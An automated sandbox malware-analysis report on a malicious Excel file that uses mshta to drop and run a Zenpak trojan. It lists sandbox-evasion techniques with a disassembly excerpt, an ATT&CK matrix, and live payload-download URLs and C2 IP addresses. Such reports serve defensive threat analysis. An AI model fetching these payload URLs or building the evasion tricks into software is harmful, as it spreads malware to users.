Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_1000F6CC push esi; mov dword ptr [esp], 00000000h
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_00240142 push eax; iretd

Source: initial sample

Static PE information: section name: .text entropy: 7.82504513314

Source: C:\Windows\System32\mshta.exe

File created: C:\ProgramData\qDialogMainChartType.exe

Jump to dropped file

Source: C:\Windows\System32\mshta.exe

File created: C:\ProgramData\qDialogMainChartType.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 8088
Source: unknown	Network traffic detected: HTTP traffic on port 8088 -> 49165

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\ProgramData\qDialogMainChartType.exe

Section loaded: OutputDebugStringW count: 505

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Show sources

Source: C:\ProgramData\qDialogMainChartType.exe	Section loaded: \KnownDlls32\Self.exE
Source: C:\ProgramData\qDialogMainChartType.exe	Section loaded: \KnownDlls32\testapp.exe

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\ProgramData\qDialogMainChartType.exe	RDTSC instruction interceptor: First address: 0000000010001332 second address: 0000000010001336 instructions: 0x00000000 rdtsc 0x00000002 mov esi, eax 0x00000004 rdtsc
Source: C:\ProgramData\qDialogMainChartType.exe	RDTSC instruction interceptor: First address: 0000000010001336 second address: 0000000010001332 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 xor eax, eax 0x00000006 xor edx, edx 0x00000008 sub edi, esi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e cmp eax, edi 0x00000010 cmovb eax, edi 0x00000013 cmp ecx, edi 0x00000015 cmovnbe ecx, edi 0x00000018 mov bl, byte ptr [esp+2Bh] 0x0000001c mov byte ptr [esp+3Bh], bl 0x00000020 mov edx, dword ptr [esp+08h] 0x00000024 add edx, 01h 0x00000027 mov esi, dword ptr [esp+2Ch] 0x0000002b cmp edx, esi 0x0000002d mov edi, ecx 0x0000002f mov esi, eax 0x00000031 mov dword ptr [esp+24h], edi 0x00000035 mov dword ptr [esp+18h], eax 0x00000039 mov dword ptr [esp+1Ch], ecx 0x0000003d mov dword ptr [esp+20h], esi 0x00000041 mov dword ptr [esp+14h], edx 0x00000045 je 00007FF638C6BCE3h 0x0000004b jmp 00007FF638C6BD3Dh 0x0000004d mov eax, dword ptr [esp+14h] 0x00000051 mov ecx, dword ptr [esp+1Ch] 0x00000055 mov edx, dword ptr [esp+18h] 0x00000059 mov dword ptr [esp+08h], eax 0x0000005d mov dword ptr [esp+04h], edx 0x00000061 rdtsc

Source: C:\ProgramData\qDialogMainChartType.exe

Window / User API: threadDelayed 505

Source: C:\Windows\System32\mshta.exe TID: 3048	Thread sleep time: -60000s >= -30000s
Source: C:\ProgramData\qDialogMainChartType.exe TID: 2220	Thread sleep count: 505 > 30

Source: C:\ProgramData\qDialogMainChartType.exe	Last function: Thread delayed
Source: C:\ProgramData\qDialogMainChartType.exe	Last function: Thread delayed

Source: C:\ProgramData\qDialogMainChartType.exe

Code function: 3_2_10010754 GetSystemInfo,

Source: C:\ProgramData\qDialogMainChartType.exe

Code function: 3_2_10019B00 LdrInitializeThunk,

Source: C:\ProgramData\qDialogMainChartType.exe

Code function: 3_2_10006D50 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

Source: C:\Windows\System32\mshta.exe

Process created: C:\ProgramData\qDialogMainChartType.exe C:\ProgramData\qDialogMainChartType.exe

Source: mshta.exe, 00000002.00000002.2363021464.0000000000F80000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2362978626.0000000000870000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: mshta.exe, 00000002.00000002.2363021464.0000000000F80000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2362978626.0000000000870000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: mshta.exe, 00000002.00000002.2363021464.0000000000F80000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2362978626.0000000000870000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\ProgramData\qDialogMainChartType.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation

Source: C:\ProgramData\qDialogMainChartType.exe

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting32	Path Interception	Process Injection12	Disable or Modify Tools1	OS Credential Dumping	Security Software Discovery31	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution23	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion21	LSASS Memory	Virtualization/Sandbox Evasion21	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Ingress Tool Transfer11	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting32	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information2	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol112	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing23	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	File and Directory Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery125	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
4TWEQh2HJb.xls	28%	Virustotal		Browse
4TWEQh2HJb.xls	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\qDialogMainChartType.exe	100%	Joe Sandbox ML
C:\ProgramData\qDialogMainChartType.exe	30%	ReversingLabs	Win32.Trojan.Zenpak

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.qDialogMainChartType.exe.10000000.3.unpack	100%	Avira	TR/Dropper.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
onlinefastsolutions.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://fontfabrik.comQ	0%	URL Reputation	safe
http://fontfabrik.comQ	0%	URL Reputation	safe
http://fontfabrik.comQ	0%	URL Reputation	safe
http://fontfabrik.comQ	0%	URL Reputation	safe
http://onlinefastsolutions.com:8088/images/details.bin	0%	Avira URL Cloud	safe
http://www.tiro.com;Copyright	0%	Avira URL Cloud	safe
http://insiderushings.com:8088/js/file13.binj	0%	Avira URL Cloud	safe
http://paymentadvisry.com:8088/wp-theme/file7.bin3.sct	0%	Avira URL Cloud	safe
http://onlinefastsolutions.com:8088/js/file1.bin	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://onlinefastsolutions.com:8088/images/file13.bin	0%	Avira URL Cloud	safe
http://onlinefastsolutions.com:8088/tpls/file3.bind	0%	Avira URL Cloud	safe
http://onlinefastsolutions.com:8088/tpls/file3.binc	0%	Avira URL Cloud	safe
http://buyer-remindment.com:8088/fonts/file8.bin	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://onlinefastsolutions.com:8088/tpls/file3.binQ	0%	Avira URL Cloud	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://onlinefastsolutions.com:8088/tpls/file3.binX	0%	Avira URL Cloud	safe
http://www.bethmardutho.org.P	0%	URL Reputation	safe
http://www.bethmardutho.org.P	0%	URL Reputation	safe
http://www.bethmardutho.org.P	0%	URL Reputation	safe
http://insiderushings.com:8088/js/file13.bin	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.ascendercorp.com/	0%	URL Reputation	safe
http://www.ascendercorp.com/	0%	URL Reputation	safe
http://www.ascendercorp.com/	0%	URL Reputation	safe
http://fasteasyupdates.com:8088/vendors/file4.bin	0%	Avira URL Cloud	safe
http://www.c-and-g.co.jp	0%	URL Reputation	safe
http://www.c-and-g.co.jp	0%	URL Reputation	safe
http://www.c-and-g.co.jp	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://paymentadvisry.com:8088/wp-theme/file7.bin	0%	Avira URL Cloud	safe
http://buyer-remindment.com:8088/tpls/file4.bin	0%	Avira URL Cloud	safe
http://onlinefastsolutions.com:8088/js/file1.binT	0%	Avira URL Cloud	safe
http://onlinefastsolutions.com:8088/images/details.binG	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://onlinefastsolutions.com:8088/tpls/file3.bin	0%	Avira URL Cloud	safe
http://www.ascendercorp.com/typedesigners.htmlt	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.htmlt	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.htmlt	0%	URL Reputation	safe
http://buyer-remindment.com:8088/tpls/file4.bin:	0%	Avira URL Cloud	safe
http://buyer-remindment.com:8088/css/file7.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
onlinefastsolutions.com	208.83.69.35	true	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://onlinefastsolutions.com:8088/tpls/file3.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://fontfabrik.comQ	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.msnbc.com/news/ticker.txt	mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	false		high
http://onlinefastsolutions.com:8088/images/details.bin	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	false	Avira URL Cloud: safe	unknown
http://www.tiro.com;Copyright	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.fontbureau.com/designers?	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false		high
http://insiderushings.com:8088/js/file13.binj	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://paymentadvisry.com:8088/wp-theme/file7.bin3.sct	mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://onlinefastsolutions.com:8088/js/file1.bin	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	false	Avira URL Cloud: safe	unknown
http://www.ncst.ernet.in/~rkjoshi	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false		high
http://www.typography.netD	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://onlinefastsolutions.com:8088/images/file13.bin	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	false	Avira URL Cloud: safe	unknown
http://onlinefastsolutions.com:8088/tpls/file3.bind	mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://onlinefastsolutions.com:8088/tpls/file3.binc	mshta.exe, 00000002.00000002.2362885454.000000000016F000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com/	mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	false		high
http://buyer-remindment.com:8088/fonts/file8.bin	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	false	Avira URL Cloud: safe	unknown
http://www.%s.comPA	mshta.exe, 00000002.00000002.2365159627.00000000039E0000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2363031596.0000000001D10000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.fonts.com	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://onlinefastsolutions.com:8088/tpls/file3.binQ	mshta.exe, 00000002.00000002.2362885454.000000000016F000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.de	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://onlinefastsolutions.com:8088/tpls/file3.binX	mshta.exe, 00000002.00000002.2362885454.000000000016F000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bethmardutho.org.P	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://insiderushings.com:8088/js/file13.bin	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	false	Avira URL Cloud: safe	unknown
http://www.windows.com/pctv.	mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	false		high
http://investor.msn.com	mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false		high
http://www.galapagosdesign.com/	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ascendercorp.com/	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fasteasyupdates.com:8088/vendors/file4.bin	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	false	Avira URL Cloud: safe	unknown
http://www.c-and-g.co.jp	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	false		high
http://paymentadvisry.com:8088/wp-theme/file7.bin	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	false	Avira URL Cloud: safe	unknown
http://buyer-remindment.com:8088/tpls/file4.bin	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	false	Avira URL Cloud: safe	unknown
http://onlinefastsolutions.com:8088/js/file1.binT	mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://onlinefastsolutions.com:8088/images/details.binG	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	mshta.exe, 00000002.00000002.2365159627.00000000039E0000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2363031596.0000000001D10000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/frere-jones.html	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false		high
http://www.ascendercorp.com/typedesigners.htmlt	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://buyer-remindment.com:8088/tpls/file4.bin:	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://buyer-remindment.com:8088/css/file7.bin	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
78.46.78.42	unknown	Germany	24940	HETZNER-ASDE	true
208.83.69.35	onlinefastsolutions.com	United States	22438	CLEAR-RATE-COMMUNICATIONSUS	false
202.29.60.34	unknown	Thailand	24344	CMRU-AS-APChiangmaiRajabhatUniversityTH	true
66.175.217.172	unknown	United States	63949	LINODE-APLinodeLLCUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	448885
Start date:	14.07.2021
Start time:	19:59:04
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 49s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	4TWEQh2HJb (renamed file extension from none to xls)
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@5/2@2/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 91.1% (good quality ratio 89.8%) Quality average: 80.4% Quality standard deviation: 24.3%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Changed system and user locale, location and keyboard layout to English - United States Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe TCP Packets have been reduced to 100 Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:59:47	API Interceptor	5x Sleep call for process: mshta.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
78.46.78.42	ldE25Snd1f.exe	Get hash	malicious	Browse
	Receipt-6218387.xls	Get hash	malicious	Browse
	BhAJLvq0c7.xls	Get hash	malicious	Browse
	PFx3G8Snzk.exe	Get hash	malicious	Browse
	9EP6Gxzv6F.xls	Get hash	malicious	Browse
	2ejCKSIjIV.exe	Get hash	malicious	Browse
	bQWApID6av.xls	Get hash	malicious	Browse
208.83.69.35	BhAJLvq0c7.xls	Get hash	malicious	Browse	buyer-remindment.com:8088/js/file13.bin
208.83.69.35	bQWApID6av.xls	Get hash	malicious	Browse	buyer-remindment.com:8088/templates/file6.bin
202.29.60.34	ldE25Snd1f.exe	Get hash	malicious	Browse
	Receipt-6218387.xls	Get hash	malicious	Browse
	BhAJLvq0c7.xls	Get hash	malicious	Browse
	PFx3G8Snzk.exe	Get hash	malicious	Browse
	9EP6Gxzv6F.xls	Get hash	malicious	Browse
	2ejCKSIjIV.exe	Get hash	malicious	Browse
	bQWApID6av.xls	Get hash	malicious	Browse
66.175.217.172	ldE25Snd1f.exe	Get hash	malicious	Browse
	Receipt-6218387.xls	Get hash	malicious	Browse
	BhAJLvq0c7.xls	Get hash	malicious	Browse
	PFx3G8Snzk.exe	Get hash	malicious	Browse
	9EP6Gxzv6F.xls	Get hash	malicious	Browse
	2ejCKSIjIV.exe	Get hash	malicious	Browse
	bQWApID6av.xls	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
onlinefastsolutions.com	Receipt-6218387.xls	Get hash	malicious	Browse	185.21.216.153

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CMRU-AS-APChiangmaiRajabhatUniversityTH	ldE25Snd1f.exe	Get hash	malicious	Browse	202.29.60.34
	Receipt-6218387.xls	Get hash	malicious	Browse	202.29.60.34
	BhAJLvq0c7.xls	Get hash	malicious	Browse	202.29.60.34
	PFx3G8Snzk.exe	Get hash	malicious	Browse	202.29.60.34
	9EP6Gxzv6F.xls	Get hash	malicious	Browse	202.29.60.34
	2ejCKSIjIV.exe	Get hash	malicious	Browse	202.29.60.34
	bQWApID6av.xls	Get hash	malicious	Browse	202.29.60.34
HETZNER-ASDE	ldE25Snd1f.exe	Get hash	malicious	Browse	78.46.78.42
